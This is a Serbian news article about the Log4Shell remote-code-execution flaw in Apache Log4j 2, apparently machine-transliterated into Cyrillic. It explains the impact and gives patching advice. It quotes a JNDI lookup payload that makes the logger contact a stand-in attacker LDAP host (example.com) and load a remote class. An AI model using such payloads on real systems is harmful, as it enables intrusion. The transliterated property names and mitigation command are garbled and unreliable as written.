Лог4Схелл, критична рањивост у Апацхе Лог4ј 2 која утиче на многе Јава пројекте

Недавно се је објавио вест да је идентификована критична рањивост у Апацхе Лог4ј 2, који се карактерише као популаран оквир за организовање регистра у Јава апликацијама, омогућавајући извршавање произвољног кода када се посебно форматирана вредност упише у регистар у формату „{јнди: УРЛ}“.

Рањивост Значајно је јер се напад може извршити у Јава апликацијама којеОни бележе вредности добијене из спољних извора, на пример, приказујући проблематичне вредности у порукама о грешци.

Примећује се да скоро сви пројекти који користе оквире као што су Апацхе Струтс, Апацхе Солр, Апацхе Друид или Апацхе Флинк су погођени, укључујући Стеам, Аппле иЦлоуд, Минецрафт клијенте и сервере.

Очекује се да ће рањивост довести до таласа масовних напада на пословне апликације, понављајући историју критичних рањивости у оквиру, Апацхе Струтс, што је груба процена која се користи у 65% веб апликација Фортуне 100. Веб апликације компаније су већ укључивале забележени покушаји скенирања мреже у потрази за рањивим системима.

Рањивост омогућава даљинско извршавање неауторизованог кода. Лог4ј 2 је Јава библиотека дневника отвореног кода коју је развила Апацхе Фоундатион. Лог4ј 2 се широко користи у многим апликацијама и присутан је, као зависност, у многим сервисима. То укључује пословне апликације, као и бројне услуге у облаку.

Рандори тим за нападе је развио функционални експлоат и успео је да успешно искористи ову рањивост у корисничким окружењима као део наше офанзивне безбедносне платформе. 

Рањивости се може приступити кроз мноштво метода специфичних за апликацију. Заиста, сваки сценарио који омогућава удаљену везу за испоруку произвољних података које апликација која користи Лог4ј библиотеку уписује у датотеке евиденције је подложан експлоатацији. Ова рањивост ће се врло вероватно искористити у дивљини и вероватно ће утицати на хиљаде организација. Ова рањивост представља значајан стварни ризик за погођене системе.

Проблем је отежан чињеницом да је функционални експлоат већ објављен, нпр.Али поправке за стабилне гране још нису генерисане. ЦВЕ идентификатор још увек није додељен. Решење је укључено само у тестну грану лог4ј-2.15.0-рц1. Као решење за блокирање рањивости, препоручује се постављање параметра Лог4ј2.форматМсгНоЛоокупс на труе.

Проблем то је било због чињенице да Лог4ј 2 подржава руковање специјалним маскама «{}» у редовима дневника, у којима ЈНДИ упити се могу покренути (Јава интерфејс за именовање и именик).

Анализирајући ЦВЕ-2021-44228, Рандори је утврдио следеће:

Подразумеване инсталације широко коришћеног пословног софтвера су рањиве.
Рањивост се може поуздано искористити и без аутентификације.
Рањивост утиче на више верзија Лог4ј 2.
Рањивост омогућава даљинско извршавање кода када корисник покрене апликацију користећи библиотеку.

Напад се своди на прослеђивање стринга са заменом „$ {јнди: лдап: //екампле.цом/а}“, обрада које ће Лог4ј 2 послати ЛДАП захтев за путању до Јава класе серверу нападача. . Путања коју враћа сервер нападача (на пример, хттп://екампле.цом/Екплоит.цласс) биће учитана и извршена у контексту тренутног процеса, омогућавајући нападачу да постигне произвољно извршење кода на систему са правима тренутне апликације.

На крају се помиње да ако се пронађу абнормалности, препоручује се да претпоставите да је ово активан инцидент, да је компромитован и да реагујете у складу са тим. Надоградња на закрпљене верзије Лог4ј 2 или погођених апликација ће елиминисати ову рањивост. Рандори препоручује било којој организацији за коју мисли да би могла бити погођена да хитно надогради на верзију са закрпљеном.

У најновијем ажурирању Апацхе Лог4ј тима, препоручују организацијама да ураде следеће

  • Ажурирајте на Лог4ј 2.15.0
  • За оне који не могу да надограде на 2.15.0: У верзијама> = 2.10, ова рањивост се може ублажити постављањем системског својства лог4ј2.форматМсгНоЛоокуп или променљиве окружења ЛОГ4Ј_ФОРМАТ_МСГ_НО_ЛООКУПС на труе.
  • За верзије 2,0-бета9 до 2.10.0, ублажавање је уклањање класе ЈндиЛоокуп из путање класе: зип -к -д лог4ј-цоре - *. Јар орг / апацхе / логгинг / лог4ј / цоре / лоокуп /ЈндиЛоокуп.цласс.

izvor: https://www.lunasec.io/


Додај као жељени извор